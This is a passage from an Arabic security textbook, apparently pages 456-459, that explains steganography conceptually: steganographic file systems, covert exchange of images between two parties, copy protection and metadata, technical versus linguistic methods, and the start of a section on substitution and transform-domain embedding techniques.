‫اﻟطرﯾﻘﺔ اﻟﺛﺎﻧﯾﺔ واﻟﺗﻲ ﯾﻘدﻣﮭﺎ ‪ Steganography File Systems‬وھﻲ أن اﻟﻣﻠﻔﺎت ﻻ ﯾﺗم ﺗﺧزﯾﻧﮭﺎ ﺑطرﯾﻘﺔ ﻋﺎدﯾﮫ‪ ،‬وﻻ ﺗﺧزﯾﻧﮭﺎ ﺑطرﯾﻘﺔ‬
‫ﻣﺷﻔرة‪ ،‬ﻟﻛن اﻟﺑﺎرﺗﺷن ﺑﺎﻟﻛﺎﻣل ﯾﺗم ﺟﻌﻠﮫ ﻋﺷواﺋﯾﺎ ‪--‬اﻟﻣﻠﻔﺎت اﻟﻣﺷﻔرة ﺗﺷﺑﮫ ﺑﻘوة اﻟﻣﻘﺎطﻊ اﻟﻌﺷواﺋﯾﺔ ﻟﻠﺑﺎرﺗﺷن‪ ،‬وﺣﺗﻰ ﻋﻧدﻣﺎ ﯾﺗم ﺗﺧزﯾن اﻟﻣﻠﻔﺎت‬
‫ﻋﻠﻰ اﻟﺑﺎرﺗﺷن‪ ،‬ﻻ ﺗوﺟد طرﯾﻘﺔ ﺳﮭﻠﺔ ﻟﻠﺗﻣﯾﯾز ﺑﯾن رطﺎﻧﺔ ﻻ ﻣﻌﻧﻰ ﻟﮭﺎ واﻟﻣﻠﻔﺎت اﻟﻣﺷﻔرة اﻟﻔﻌﻠﯾﺔ‪ .‬وﻋﻼوة ﻋﻠﻰ ذﻟك‪ ،‬ﻓﺄن ﻣواﻗﻊ اﻟﻣﻠﻔﺎت ﺗﻛون‬
‫ﻣﻌرﻓﺔ ﻣن ﻗﺑل ﻣﻔﺎﺗﯾﺢ اﻟﻣﻠﻔﺎت‪ ،‬وﻣواﻗﻊ اﻟﻣﻠﻔﺎت ﺗﻛون ﻣﺧﻔﯾﺔ وﻣﺗﺎﺣﺔ ﻓﻘط ﻟﻠﺑراﻣﺞ ﻣﻊ ﻛﻠﻣﺔ اﻟﻣرور‪ .‬وھذا ﯾؤدي إﻟﻰ اﻟﻣﺷﻛﻠﺔ وھﻲ اﻧﮫ ﯾﻣﻛن‬
‫اﻟﻛﺗﺎﺑﺔ ﻓوق اﻟﻣﻠﻔﺎت ﺑﻌﺿﮭﺎ اﻟﺑﻌض ﺑﺳرﻋﺔ ﺟداً؛ وھذا ﯾﺗم ﺣﻠﮫ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ ﻛﺎﻓﺔ اﻟﻣﻠﻔﺎت ﻓﻲ أﻣﺎﻛن ﻣﺗﻌددة ﻟﺗﻘﻠﯾل ﻓرﺻﺔ ﻓﻘد اﻟﺑﯾﺎﻧﺎت‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪456‬‬

‫‪Media Bridging‬‬

‫اﺳﺗﺧدام إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟرﻗﻣﯾﺔ‪ ،‬ﺣﯾث ﯾﻣﻛن ﺗﺷﻔﯾر اﻻﺗﺻﺎﻻت اﻹﻟﻛﺗروﻧﯾﺔ ﻓﻲ طﺑﻘﺔ اﻟﻧﻘل)‪ ، (transport layer‬ﻣﺛل ﻣﻠف اﻟﻣﺳﺗﻧد أو‬
‫ﻣﻠف ﺻورة أو ﺑرﻧﺎﻣﺞ أو ﺑروﺗوﻛول‪.‬‬
‫ﻓﻲ ھذه اﻟﻣﻧطﻘﺔ ﺗطﺑﯾﻖ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻟﯾس ﻣﮭﻣﺎ‪ ،‬وﻟﻛن ﺗوﺣﯾد ھذﯾن اﻟﻧوﻋﯾن ﻣن اﻟﺑﯾﺎﻧﺎت )اﻟوﺳﺎﺋط – اﻟﺑﯾﺎﻧﺎت( إﻟﻰ واﺣد ھو اﻷﻛﺛر‬
‫أھﻣﯾﺔ‪ .‬اﻟوﺳﺎﺋط ﻣﺛل )اﻟﺻور‪ ،‬اﻻﻓﻼم‪ ،‬اﻟﻣوﺳﯾﻘﻰ‪ ،‬إﻟﺦ( ﯾﺗم رﺑطﮭﺎ ﺑﺑﻌض اﻟﻣﻌﻠوﻣﺎت اﻷﺧرى‪ .‬اﻟﺻورة‪ ،‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻗد ﺗﺣﺗوي ﻋﻠﻰ‬
‫ﻣﺎ ﯾﻠﻲ ﻣن اﻟﻣﻌﻠوﻣﺎت‪:‬‬
‫‪ -1‬ﻋﻧوان ﻟﻠﺻورة وﺑﻌض اﻟﻣﻌﻠوﻣﺎت ﻋن ‪.physical object‬‬
‫‪ -2‬اﻟﺗﺎرﯾﺦ واﻟوﻗت ﻋﻧد اﺗﺧﺎذ ھذه اﻟﺻورة‪.‬‬
‫‪ -3‬ﻣﻌﻠوﻣﺎت ﻋن اﻟﻛﺎﻣﯾرا اﻟﻣﺳﺗﺧدﻣﺔ واﻟﻣﺻور‪.‬‬
‫ھذه اﻟﻣﻌﻠوﻣﺎت داﺋﻣﺎ ﻣﺎ ﺗﻛون ﺑﺟﺎﻧب ﻛل ﺻوره‪.‬‬
‫ﻓﻲ اﻟﻣﻣﺎرﺳﺎت اﻟﻌﻣﻠﯾﺔ‪ ،‬ﻋﻧد اﺳﺗﺧدام إﺧﻔﺎء ﺑﻌض اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﯾﺟب أوﻻً ﺗﺣدﯾد ﺑﯾﺎﻧﺎت اﻟﻣﺳﺗودع اﻟذي ﺳوف ﯾﺣﻣل اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﺑﺎءه وﻓﻘﺎ‬
‫ﻟﺣﺟم ﺑﯾﺎﻧﺎت اﻟﺗﺿﻣﯾن‪ .‬وﯾﻧﺑﻐﻲ أن ﯾﻛون اﻟﻣﺳﺗودع ﻏﯾر ﺿﺎرة‪ .‬ﺛم‪ ،‬ﯾﻣﻛﻧك ﺗﺿﻣﯾن ﺑﯾﺎﻧﺎت ﺳرﯾﺔ ﺑﺎﺳﺗﺧدام ﺑرﻧﺎﻣﺞ ﺗﺿﻣﯾن )واﻟذي أﺣد‬
‫ﻣﻛوﻧﺎت اﻟﺑرﻧﺎﻣﺞ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت( ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ﺑﻌض اﻟﻣﻔﺗﺎح‪ .‬ﻋﻧد اﺳﺗﺧراج‪ ،‬اﻟﺑﯾﺎﻧﺎت )اﻟطرف اﻟﺧﺎص ﺑك( ﺑﺎﺳﺗﺧدام ﺑرﻧﺎﻣﺞ‬
‫اﺳﺗﺧراج )ﻣﻛون آﺧر( ﻻﺳﺗرداد ﺑﯾﺎﻧﺎت ﻣﺿﻣﻧﮫ ﺑﻧﻔس اﻟﻣﻔﺗﺎح )اﻟﻣﻔﺗﺎح اﻟﻌﺎم ﻣن ﺣﯾث ﻣﻔﮭوم اﻟﺗﺷﻔﯾر(‪ .‬وﻓﻲ ھذه اﻟﺣﺎﻟﺔ ﺗﺣﺗﺎج اﻟﻰ 'ﻣﻔﺗﺎح‬
‫اﻟﺗﻔﺎوض ﻗﺑل أن ﺗﺑدأ اﻻﺗﺻﺎﻻت‪.‬‬
‫إرﻓﺎق ﻣﻠف ﺳﺗﯾﺟو ﺑرﺳﺎﻟﺔ اﻟﺑرﯾد إﻟﻛﺗروﻧﻲ ھو أﺑﺳط ﻣﺛﺎل ﻓﻲ ھذا اﻟﻣﺟﺎل‪ .‬وﻟﻛن أﻧت واﻟطرف اﻟﺧﺎص ﺑك ﯾﺟب اﻟﻘﯾﺎم ﺑﺈﺟراء 'إرﺳﺎل‪--‬و‪--‬‬
‫ﺗﻠﻘﻲ' اﻟﺗﻲ ﯾﻣﻛن أن ﯾﺗم ﻣﻼﺣظﺗﮭﺎ ﻣن ﻗﺑل طرف ﺛﺎﻟث‪ .‬ﻟذا‪ ،‬اﺳﺗﺧدام اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻟﯾس أﺳﻠوب اﺗﺻﺎل ﺳري ﺗﻣﺎﻣﺎ‪.‬‬
‫ھﻧﺎك ﺑﻌض أﺳﻠوب اﻻﺗﺻﺎل اﻷﺧرى ﻣﺛل اﻟذي ﯾﺳﺗﺧدم 'ﺻﻔﺣﺔ اﻟوﯾب' اﻹﻧﺗرﻧت‪ .‬ﻓﻲ ھذه اﻟطرﯾﻘﺔ ﻻ ﺗﺣﺗﺎج إﻟﻰ إرﺳﺎل أي ﺷﻲء إﻟﻰ اﻟطرف‬
‫اﻟﺧﺎص ﺑك‪ ،‬وﻻ أﺣد ﯾﺳﺗطﯾﻊ ﻛﺷف اﻻﺗﺻﺎل اﻟﺧﺎﺻﺔ ﺑك‪ .‬ﻓﻠﻧظر اﻟﻰ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ‪:‬‬

‫ﻟﻧﻔرض ﻣﺛﻼ وﺟود ﺷﺧﺻﯾن ﯾرﯾدان اﻟﺑدء ﻓﻲ اﺗﺻﺎل ﺳري ﺑﯾﻧﮭم ﻣﺛﻼ ﻓﻠﯾﻛن ھذﯾن اﻟﺷﺧﺻﯾن )‪ Mr. A‬و‪ ( Mr. B‬ﻛﻣﺎ ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪.‬‬
‫ﻧﺟد أن ﻟدﯾﮭم ﻛل ﺻﻔﺣﺎت اﻟوﯾب اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ .‬ﻧﺟد ان اﻟﺷﺧص ‪ Mr. A‬ﯾﻣﻠك ﺑﯾﺎﻧﺎت ﺻورة )ﺻورة اﻣرأة(‪ ،‬واﻟﺷﺧص‬
‫‪ Mr. B‬ھو اﻷﺧر ﯾﻣﻠك ﺑﯾﺎﻧﺎت ﺻورة )ﺻورة اﻟﺣوت اﻟﻘﺎﺗل(‪ .‬واﻻﺛﻧﯾن واﻓﻘﺎ ﺑﺎﻟﻔﻌل ﻋﻠﻰ اﺳﺗﺧدام ﻣﻔﺗﺎح ﻣﺷﺗرك ﻣﻌﯾن ﻟﺗﺿﻣﯾن‪/‬اﺳﺗﺧراج‬
‫اﻟرﺳﺎﺋل‪.‬‬
‫ھذا اﻻﺗﺻﺎل ﯾﺗم ﻛﺎﻻﺗﻰ‪:‬‬
‫‪ -1‬ﯾﻘوم اﻟﺷﺧص ‪ Mr. A‬أوﻻ ﺑﺈﻧﺷﺎء رﺳﺎﻟﺔ ﻧﺻﯾﮫ وﻟﯾﻛن ﻣﺛﻼ ‪ message‬ﺛم ﯾﻘوم ﺑﺗﺿﻣﯾﻧﮭﺎ ﻓﻲ ﺻورة اﻣرأة ﻟﯾﻧﺗﺞ ﻣﻠف ﺳﺗﯾﺟو ﻣن‬
‫ﺻورة اﻣراه‪.‬‬
‫‪ -2‬ﺛم ﯾﻘوم اﻟﺷﺧص ‪ Mr. A‬ﺑﺗﺣﻣﯾﻠﮭﺎ ﻋﻠﻰ ﺻﻔﺣﺔ اﻟوﯾب ﺧﺎﺻﺗﮫ‪.‬‬
‫‪ -3‬ﻗرﯾﺑﺎ ﺳوف ﯾﻼﺣظ اﻟﺷﺧص ‪ Mr. B‬ﺑذﻟك‪ ،‬ﺛم ﯾﻘوم ﺑﺗﺣﻣﯾﻠﮭﺎ‪.‬‬
‫‪ -4‬ﺛم ﯾﻘوم اﻟﺷﺧص ‪ Mr. B‬ﺑﺎﺳﺗﺧراج ﻣﺣﺗوﯾﺎت اﻟﺻورة ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ اﻻﺳﺗﺧراج ﻣﻊ اﻟﻣﻔﺗﺎح اﻟﻣﺷﺗرك ﺑﯾﻧﮭم‪.‬‬
‫‪ -5‬ﯾﻘوم اﻟﺷﺧص ‪ Mr. A‬ﺑﺈﻧﺷﺎء رﺳﺎﻟﺔ رد وﻟﺗﻛن ﻣﺛﻼ ‪ .REPLY‬ﺛم ﯾﻘوم ﺑﺗﺿﻣﯾﻧﮭﺎ داﺧل ﺻورة اﻟﺣوت اﻟﻘﺎﺗل‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪457‬‬

‫)‪Copy Prevention or Control (DVD‬‬

‫ﻓﻲ وﺳﺎﺋل اﻟﺗرﻓﯾﮫ ﯾﻣﻛن اﺳﺗﺧدام ‪ industry steganography‬ﻟﺣﻣﺎﯾﺔ ﺣﻘوق اﻟﺗﺄﻟﯾف واﻟﻧﺷر ﻷﻗراص اﻟﻔﯾدﯾو اﻟرﻗﻣﯾﺔ واﻷﻗراص اﻟﻣدﻣﺟﺔ‪.‬‬
‫ﺗم ﺗﺻﻣﯾم ﺑرﻧﺎﻣﺞ ﺣﻣﺎﯾﺔ ﻧﺳﺧﺔ دي ﻓﻲ دي ﻟدﻋم ﻧظﺎم إدارة ﺗوﻟﯾد اﻟﻧﺳﺦ‪.‬‬
‫)‪Metadata Hiding (Tracking Information‬‬
‫ﯾﻣﻛن اﺳﺗﺧدام اﻟﺑﯾﺎﻧﺎت اﻟوﺻﻔﯾﺔ )‪ (metadata‬ﻟﺗﺗﺑﻊ اﻟﻣوﻗﻊ اﻟﺟﻐراﻓﻲ‪ ،‬وﻣﻧﻊ أو ﻣراﻗﺑﺔ ﻧﺳﺦ اﻟﻣواد اﻟرﻗﻣﯾﺔ‪ ،‬أي ﻣﻧﻊ اﻻزدواﺟﯾﺔ ﻏﯾر‬
‫اﻟﻣﺻرح ﺑﮭﺎ ﻟﻠﺑﯾﺎﻧﺎت اﻟرﻗﻣﯾﺔ‪.‬‬
‫)‪Broadcast Monitoring (Gibson, Pattern Recognition‬‬
‫‪Covert Communication‬‬
‫‪Ownership Assertion‬‬
‫)‪Fingerprinting (Traitor Tracking‬‬
‫)‪Authentication (Original vs. Forgery‬‬

‫‪Classification of Steganography‬‬
‫ﯾﺻﻧف ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت )‪ (Steganography‬إﻟﻰ ﻣﺟﺎﻟﯾن اﺳﺗﻧﺎدا ً إﻟﻰ ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪ .‬وھﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻧﻲ‬
‫)‪ (technical steganography‬وإﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻠﻐوﯾﺔ)‪. (linguistic steganography‬‬
‫إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻧﻲ )‪ (technical steganography‬ﺗﻘوم ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﺑﺎﺳﺗﺧدام اﻷﺳﺎﻟﯾب اﻟﻌﻠﻣﯾﺔ‪ ،‬ﺑﯾﻧﻣﺎ ﯾﻘوم إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻠﻐوﯾﺔ‬
‫)‪ (linguistic steganography‬ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﻓﻲ اﻟﻧﺎﻗل)‪ ،(Carrier‬وﺳﯾﻠﺔ ﺗﺳﺗﺧدم ﻟﻼﺗﺻﺎل أو ﻧﻘل اﻟرﺳﺎﺋل أو اﻟﻣﻠﻔﺎت‪ .‬ﻋﺎدة ﻣﺎ ﯾﺗم‬
‫ﺗﻌرﯾف ﻣﺗوﺳط إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت )‪ (The steganography medium‬ﻋﻠﻰ أﻧﮫ اﻟﺟﻣﻊ ﺑﯾن اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ‪ ،‬واﻟﻧﺎﻗل‪ ،‬وﻣﻔﺗﺎح إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪.‬‬
‫ﯾﺻف اﻟﻣﺧطط اﻟﺗﺎﻟﻲ ﺗﺻﻧﯾف ﻟﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪.‬‬

‫إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت اﻟﺘﻘﻨﻲ )‪(technical steganography‬‬


‫إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻧﻲ ھﻲ وﺳﯾﻠﺔ ﻟﺗﺄﻣﯾن اﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ ﻣﻊ ﻣﺳﺎﻋدة ﻣن اﻷﺳﺎﻟﯾب اﻟﻔﯾزﯾﺎﺋﯾﺔ أو اﻟﻛﯾﻣﯾﺎﺋﯾﺔ ﻹﺧﻔﺎء وﺟود اﻟرﺳﺎﻟﺔ اﻟﻧﺻﯾﺔ‪.‬‬
‫ﯾﻣﻛﻧك اﺳﺗﺧدام اﻟﻌدﯾد ﻣن اﻷدوات واﻷﺟﮭزة واﻷﺳﺎﻟﯾب‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪458‬‬

‫إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻘﻧﻲ ﻟدﯾﮫ اﻟﻌدﯾد ﻣن اﻷﺳﺎﻟﯾب ﻟﺗﺣﻘﯾﻖ إﺧﻔﺎء اﻟرﺳﺎﻟﺔ‪ .‬وﺗﺷﻣل ﺑﻌض ﻣﻧﮭم ﻛﺎﻻﺗﻰ‪:‬‬
‫‪ -‬اﻟﺣﺑر اﻟﺳري )‪(Invisible Ink‬‬
‫ھذا اﻷﺳﻠوب ﯾﺳﺗﺧدم اﻟﺣﺑر اﻟﺳري ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ ‪.‬‬
‫‪ -‬ﻣﯾﻛرودوﺗس )‪(Microdots‬‬
‫ھﻲ اﻟطرﯾﻘﺔ اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء ﺻﻔﺣﺔ ﻓﻲ ﻧﻘطﺔ واﺣده‪.‬‬
‫‪ -‬اﻷﺳﺎﻟﯾب اﻟﻣﺳﺗﻧدة إﻟﻰ اﻟﻛﻣﺑﯾوﺗر)‪(Computer-based methods‬‬
‫اﺳﺗﺧدام اﻟﻣﻌﻠوﻣﺎت واﺧﻔﺎﺋﮭﺎ ﻓﻲ اﻟﻧﺻوص‪ ،‬واﻟﺻور واﻷﺻوات وأﺷرطﺔ اﻟﻔﯾدﯾو‪ ،‬إﻟﺦ‪.‬‬
‫إﺧﻔﺎء اﻟﻤﻌﻠﻮﻣﺎت اﻟﻠﻐﻮﯾﺔ )‪(linguistic steganography‬‬
‫إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﻠﻐوي ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﻓﻲ ﻧﺎﻗل )‪(Carrier\vessels‬ﺑﺎﺳﺗﺧدام ﺑﻌض اﻟطرق اﻟﻣﺑﺗﻛرة‪ .‬ﯾﺗم ﺗﺻﻧﯾف ھذه اﻟﺗﻘﻧﯾﺔ‪ ،‬ﻋﻠﻰ‬
‫أﻧﮭﺎ ‪ semagrams‬أو ‪.open codes‬‬
‫‪Semagrams -1‬‬
‫ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب اﻟرﻣوز واﻟﻌﻼﻣﺎت اﻟﻣﺧﺗﻠﻔﺔ ﻹﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت أو اﻟرﺳﺎﺋل‪ .‬ﻛذﻟك ﯾﺻﻧف ھذا أﯾﺿﺎ اﻟﻰ ﺳﯾﻣﺎﺟراﻣس اﻟﺑﺻري‬
‫وﺳﯾﻣﺎﺟراﻣس اﻟﻧﺻﻲ‪.‬‬
‫‪ -‬ﺳﯾﻣﺎﺟراﻣس اﻟﺑﺻري )‪(Visual Semagrams‬‬
‫ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب اﻟﻛﺎﺋﻧﺎت اﻟﻣﺎدﯾﺔ اﻟﻐﯾر ﺿﺎره )‪ (unmalicious physical objects‬ﻹرﺳﺎل رﺳﺎﻟﺔ ﻣﺛل رﺳوﻣﺎت اﻟﺷﻌﺎرات أو ﺗﺣدﯾد‬
‫ﻣواﻗﻊ اﻟﻌﻧﺎﺻر اﻟﻣوﺟودة ﻓﻲ اﻟﻣﻛﺗب أو اﻟﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪.‬‬
‫‪ -‬ﺳﯾﻣﺎﺟراﻣس اﻟﻧﺻﻲ )‪(Text Semagrams‬‬
‫ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب ﻓﻲ إﺧﻔﺎء ﻧص اﻟرﺳﺎﻟﺔ ﻋن طرﯾﻖ ﺗﺣوﯾل أو ﺗﻐﯾﯾر ﻣظﮭر اﻟرﺳﺎﻟﺔ اﻟﻧﺻﯾﺔ اﻟﻧﺎﻗﻠﺔ‪ ،‬ﻣﺛل ﺗﻐﯾﯾر أﺣﺟﺎم اﻟﺧطوط واﻷﻧﻣﺎط‪،‬‬
‫وإﺿﺎﻓﺔ ﻣﺳﺎﻓﺎت إﺿﺎﻓﯾﺔ ﻛﻣﺳﺎﻓﺎت ﺑﯾﺿﺎء ﻓﻲ اﻟوﺛﯾﻘﺔ‪ ،‬واﻻﻧﻔﻌﺎﻻت اﻟﻣﺧﺗﻠﻔﺔ ﻓﻲ اﻟﺧطﺎﺑﺎت أو اﻟﻧص اﻟﻣﻛﺗوب ﺑﺧط اﻟﯾد‪.‬‬
‫‪Open codes -2‬‬
‫‪ Open codes‬ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﻓﻲ رﺳﺎﻟﺔ ﺷرﻋﯾﮫ ﺣﺎﻣﻠﺔ )‪ (legitimate carrier message‬واﻟﺗﻲ ﺻﻣﻣت ﺧﺻﯾﺻﺎ ﻓﻲ ﻧﻣط‬
‫اﻟوﺛﯾﻘﺔ‪/‬اﻟﻣﺳﺗﻧد واﻟﺗﻲ ﻻ ﺗﻛون واﺿﺣﮫ ﻟﻠﻘﺎرئ اﻟﻌﺎدي‪ .‬ﺣﺎﻣل اﻟرﺳﺎﻟﺔ أﺣﯾﺎﻧﺎ ﯾطﻠﻖ ﻋﻠﯾﮫ أﺳم اﻻﺗﺻﺎل اﻟﻣﻛﺷوف )‪(overt communication‬‬
‫واﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ ﯾطﻠﻖ ﻋﻠﯾﮫ اﺳم اﻻﺗﺻﺎل اﻟﺳري )‪ .(covert communication‬ﺗﻘﻧﯾﺔ ‪ Open codes‬ﺗﻧﻘﺳم إﻟﻰ ﻣﺟﻣوﻋﺗﯾن رﺋﯾﺳﯾﺗﯾن‪ :‬وھﻣﺎ‬
‫‪ jargon codes‬و‪ .covered ciphers‬ﻛﻣﺎ ﯾﻧﻘﺳم ‪ covered ciphers‬اﯾﺿﺎ اﻟﻰ ﻧوﻋﯾن‪ null ciphers :‬و‪.grille ciphers‬‬
‫‪jargon codes -‬‬
‫‪ Jargon codes‬ھﻲ ﻋﺑﺎره ﻋن ﻟﻐﺔ ﯾﻔﮭﻣﮭﺎ ﻣﺟﻣوﻋﺔ ﻣن اﻟﻧﺎس وﻟﻛن ﻻ ﯾﻔﮭﻣﮭﺎ اﻻﺧرﯾن‪ .‬ھذه اﻷﻛواد ﺗﺳﺗﺧدم اﻹﺷﺎرات‪ ،‬واﻟﻣﺻطﻠﺣﺎت‪،‬‬
‫واﻷﺣﺎدﯾث اﻟﺗﻲ ﻟﮭﺎ ﻣﻌﻧﻰ ﺧﺎص واﻟﺗﻲ ﺗﻛون ﻣﻔﮭوﻣﮫ ﻟﻣﺟﻣوﻋﺔ ﻣﺣددة ﻣن اﻟﻧﺎس‪ .‬اﻟﻣﺟﻣوﻋﺔ اﻟﻔرﻋﯾﺔ ﻣن ‪ Jargon codes‬ھﻲ رﻣوز ﺟدﯾﻠﺔ‬
‫)‪ ،(cue codes‬ﺣﯾث ﺗﺣول ﺑﻌض اﻟﻌﺑﺎرات اﻟﺗﻲ ﺗم ﺗرﺗﯾﺑﮭﺎ ﻣﺳﺑﻘﺎ ً اﻟﻰ ﻣﻌﺎﻧﻲ‪.‬‬
‫‪covered ciphers -‬‬
‫ﻓﯾﮫ ﺗﻛون اﻟرﺳﺎﻟﺔ ﻣﺧﻔﯾﮫ ﻋﻠﻧﺎ ﻓﻲ اﻟوﺳﯾط اﻟﻧﺎﻗل ﺣﯾث أن أي ﺷﺧص ﯾﻌرف ﺳر ﻛﯾﻔﯾﺔ إﺧﻔﺎء اﻟرﺳﺎﻟﺔ ﯾﻣﻛن اﺳﺗﻌﺎدﺗﮭﺎ‪ .‬وﯾﻧﻘﺳم ھذا اﻟﻧوع اﻟﻰ‬
‫ﻧوﻋﯾن اﺧرﯾن ھﻣﺎ‪ grille ciphers :‬و‪.null ciphers‬‬
‫‪ Grille ciphers‬ھذا اﻟﻧوع ﯾﺳﺗﺧدم اﻟﻘﺎﻟب )‪ (Template‬واﻟذى ﯾﺳﺗﺧدم ﻟﺗﻐطﯾﺔ اﻟرﺳﺎﻟﺔ اﻟﻧﺎﻗﻠﺔ‪ .‬اﻟﻛﻠﻣﺎت اﻟﺗﻲ ﺗظﮭر ﻓﻲ ﻓﺗﺣﺎت اﻟﻘﺎﻟب ھﻲ‬
‫اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ‪.‬‬
‫ً‬
‫‪ Null cipher‬ﯾﺧﻔﻲ اﻟرﺳﺎﻟﺔ ﺑﺎﺳﺗﺧدام ﻣﺟﻣوﻋﺔ ﻣن اﻟﻘواﻋد اﻟﻣرﺗﺑﺔ ﻣﺳﺑﻘﺎ ‪ ،‬ﻣﺛل 'اﻟﻘراءة ﻋﻧد اﻟﻛﻠﻣﺔ اﻟﺧﺎﻣﺳﺔ' أو '' اﻟﻧظر إﻟﻰ اﻟﺣرف اﻟﺛﺎﻟث‬
‫ﻣن ﻛل ﻛﻠﻣﺔ '‪ .‬وﯾﻣﻛن اﺳﺗﺧداﻣﮫ أﯾﺿﺎ ﻓﻲ إﺧﻔﺎء ﻧص ﻣﺷﻔر‪.‬‬

‫ﺗﻘﻧﯾﺎت أﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ‪Steganography Techniques‬‬


‫ﺗﻘﻧﯾﺎت إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت )‪ (Steganography techniques‬ﺗﺻﻧف إﻟﻰ ﺳت ﻣﺟﻣوﻋﺎت رﺋﯾﺳﯾﮫ اﺳﺗﻧﺎداً إﻟﻰ ﻏطﺎء اﻟﺗﻌدﯾﻼت اﻟﺗﻲ ﯾﺗم‬
‫ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ ﻋﻣﻠﯾﺔ اﻟﺗﺿﻣﯾن‪ .‬وھم ﻛﺎﻻﺗﻰ‪:‬‬
‫ﺗﻘﻨﯿﺎت اﻻﺳﺘﺒﺪال )‪(Substitution Techniques‬‬
‫ﻓﻲ ھذا اﻷﺳﻠوب‪ ،‬ﯾﺣﺎول اﻟﻣﮭﺎﺟم ﺗرﻣﯾز اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ )‪ (Encode Secret Information‬ﻋن طرﯾﻖ اﺳﺗﺑدال اﻟﺑﺗﺎت اﻟﺿﺋﯾﻠﺔ‪/‬اﻟﻣﮭﻣﻠﺔ‬
‫ﻣن اﻟوﺳﯾط اﻟﻧﺎﻗل ﻣﻊ اﻟرﺳﺎﻟﺔ ﺳرﯾﺔ‪ .‬ﻓﺈذا ﻛﺎن اﻟﻣﺗﻠﻘﻲ ﯾﻌرف أﻻﻣﺎﻛن اﻟﺗﻲ ﯾﺗم ﻓﯾﮫ ﺗﺿﻣﯾن اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ‪ ،‬ﻓﺄﻧﮫ ﯾﻣﻛﻧﮫ اﺳﺗﺧراج اﻟرﺳﺎﻟﺔ‬
‫اﻟﺳرﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪459‬‬

‫ﺗﻘﻨﯿﺎت ﺗﺤﻮﯾﻞ اﻟﺪوﻣﯿﻦ )‪(Transform Domain Techniques‬‬


‫‪ Transform Domain Techniques‬ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻓﻲ أﺟزاء ﺧﺎﺻﮫ ﻣن اﻟﺻور )‪) (Cover Image‬اﻟوﺳﯾط اﻟﻧﺎﻗل( وذﻟك‬
‫ﺑﺎﺳﺗﺧدام ﺑﻌض اﻟﺗﻘﻧﯾﺎت ﻣﺛل )‪ The Discrete Cosine Transform (DCT‬وذﻟك ﻣن ﺧﻼل ﻋﻣﻠﯾﺔ اﻟﺗﺣول ﻓﻲ اﻹﺷﺎرات ﻣﺛل‬
